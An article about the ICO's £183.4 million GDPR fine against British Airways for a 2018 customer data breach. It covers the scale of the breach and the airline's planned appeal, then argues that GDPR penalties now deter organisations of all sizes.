British Airways is set to be fined £183.4 million for a data breach that affected around 500,000 customers last year.
The airline, owned by IAG, says it is “surprised and disappointed” by the penalty – the largest ever fine for a data breach and the first to be issued in the UK under the GDPR (General Data Protection Regulation).
Few details emerged when the breach was originally disclosed in September 2018, with British Airways simply stating that it had been subject to a “sophisticated, malicious criminal attack” that compromised the personal and financial details of visitors to the airline’s website and mobile app.
A cyber security firm claimed that criminal hackers had injected malicious code into British Airways’ website, diverting traffic to a fraudulent replica.
This would mean that customers were handing their information to fraudsters as they entered their login details, payment card information, address and travel booking information into the bogus site.
The ICO’s (Information Commissioner’s Office) investigation confirmed this, also learning that the breach was more extensive than British Airways thought. The incident began in June 2018, rather than September, as the airline claimed, which meant that the estimate of 380,000 affected customers was at least 100,000 short of the actual figure.
What happens now?
British Airways has 28 days to appeal, which it will almost certainly do.
Willie Walsh, chief executive of IAG, said: “We intend to take all appropriate steps to defend the airline’s position vigorously, including making any necessary appeals”.
The airline will be aided by the fact that it has since improved its online security mechanisms. However, even if those retroactive steps are enough to reduce the fine, the organisation will still be faced with a huge penalty.
A landmark GDPR case
Things could have been worse for British Airways – but not by much. The ICO determined that the airline’s security and response weren’t poor enough to justify the maximum fine under the GDPR, which is 4% of the organisation’s annual global turnover.
Instead, the £183.4 million fine represents 1.5% of British Airways 2017 annual turnover.
No one could argue that the penalty was lenient, though; it’s a little under £183 million more than the £500,000 fine handed out to Facebook less than a year ago, which was the previous record fine for a data breach in the UK.
The staggering difference in fines shows how influential the GDPR is. Prior to the Regulation taking effect, £500,000 was the maximum penalty the ICO could levy, which is hardly a deterrent to organisations like Facebook, which reportedly make that much money every five and a half minutes.
That’s not to say the aim of the GDPR is to cripple organisations financially. That would only make things worse: regulators want organisations to invest in information security, and if they have to fork out huge sums in penalties they’ll have less to spend on defence mechanisms.
However, penalties must be big enough to act as a deterrent, and with the GDPR that’s finally the case for everybody. After all, it’s not just huge corporations that need to worry; every organisation faces cyber security risks and the majority of incidents that the ICO investigates relate to SMEs.
Now that the first GDPR fine has arrived, we expect a steady stream to follow. They won’t all be as astronomical as the British Airways incident, but they will all be significant relative to the organisation’s size.
If you had any doubt that the GDPR wasn’t something you need to worry about, this is the time to face the facts. Data protection and privacy have become crucial issues in modern business, and organisations must address them if they are to avoid data breaches and unhappy customers.